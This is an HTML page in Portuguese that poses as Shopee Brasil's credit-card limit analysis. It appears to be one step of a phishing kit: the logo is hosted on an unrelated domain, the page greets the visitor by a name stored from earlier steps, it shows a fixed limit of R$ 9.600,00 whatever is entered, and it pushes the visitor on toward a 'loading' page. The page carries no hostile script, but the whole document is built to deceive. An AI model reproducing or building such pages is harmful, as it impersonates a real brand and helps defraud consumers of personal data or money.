﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Análise de Limite</title>
    <link href="../../npm/bootstrap%405.3.0/dist/css/bootstrap.min-4.css" rel="stylesheet">
























    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            font-family: 'Inter', sans-serif;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            font-size: 1.25rem;
            font-weight: 600;
            grid-area: top-bar;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 0 auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .limit-box {
            background: #FFF5F3;
            padding: 1.5rem;
            border-radius: 12px;
            text-align: center;
            border: 1px solid rgba(238, 77, 45, 0.1);
            margin-bottom: 1rem;
        }

        .limit-value {
            font-size: 1.75rem;
            font-weight: 700;
            color: #EE4D2D;
            margin: 0;
        }

        .show-limite {
            align-items: center;
            border: 1px dashed #EE4D2D;
            border-radius: 8px;
            color: #EE4D2D;
            cursor: pointer;
            display: inline-flex;
            font-size: 0.875rem;
            gap: 0.5rem;
            padding: 0.5rem 1rem;
            background: transparent;
            transition: all 0.2s ease;
        }

        .show-limite:hover {
            background: rgba(238, 77, 45, 0.05);
        }

        .show-limite svg {
            color: #EE4D2D;
        }

        .analysis-message {
            color: #1F2937;
            margin-bottom: 1.5rem;
            font-size: 1rem;
            line-height: 1.6;
        }

        .analysis-message strong {
            color: #EE4D2D;
        }

        .btn-custom {
            color: #ffffff;
            border: none;
            width: 100%;
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            font-weight: 500;
            padding: 1rem 2rem;
            font-size: 1rem;
            border-radius: 50px !important;
            transition: all 0.3s ease;
            margin-top: 1rem;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .confirmation-text {
            color: #4B5563;
            margin-top: 1rem;
            font-size: 0.9375rem;
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #EE4D2D;
            padding: 2rem 1rem;
            position: relative;
            margin-top: 3rem;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem auto;
                padding: 1.5rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;" class="main-content">
            <div id="analise-secao" class="mb-3">
                <p id="mensagem-analise" class="analysis-message"></p>
                <div class="limit-box">
                    <p id="mostraValor" class="limit-value">R$ ****</p>
                    <button onclick="verLimite()" class="show-limite">
                        ver limite
                        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24">
                            <path fill="currentColor" d="M12 9a3 3 0 0 1 3 3a3 3 0 0 1-3 3a3 3 0 0 1-3-3a3 3 0 0 1 3-3m0-4.5c5 0 9.27 3.11 11 7.5c-1.73 4.39-6 7.5-11 7.5S2.73 16.39 1 12c1.73-4.39 6-7.5 11-7.5M3.18 12a9.821 9.821 0 0 0 17.64 0a9.821 9.821 0 0 0-17.64 0"/>
                        </svg>
                    </button>
                </div>
                <p class="confirmation-text">Podemos prosseguir com a solicitação do cartão?</p>
                <button class="btn btn-custom" onclick="location.href='../7-loading/index.php.html'">
                    Sim, quero meu cartão!
                </button>
            </div>
        </div>
    </div>

    <div class="footer" id="footerChg">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    function mostrarPagina(paginaId) {
        document.getElementById('analise-secao').style.display = 'none';

        const dadosUsuario = localStorage.getItem('dadosUsuarioUni');
        if (dadosUsuario) {
            const dados = JSON.parse(dadosUsuario);
            const primeiroNome = dados.nome.split(' ')[0];
            if (paginaId === 'analise-secao') {
                const mensagemAnalise = `<strong>${primeiroNome}</strong>, analisamos suas informações e notamos que este é o <strong>primeiro cartão</strong> que você solicita conosco. Sendo assim, não conseguimos <strong>liberar limites</strong> acima de R$ 10.000,00. Mas não se preocupe, nosso sistema consegue liberar um cartão para você com um limite de até:`;
                document.getElementById('mensagem-analise').innerHTML = mensagemAnalise;
            }
        }

        document.getElementById(paginaId).style.display = 'block';
    }

    function verLimite() {
        document.getElementById('mostraValor').innerHTML = "R$ 9.600,00";
    }

    mostrarPagina('analise-secao');
</script>

<script src="../../npm/bootstrap%405.3.0/dist/js/bootstrap.bundle.min-4.js"></script>
</body>
</html>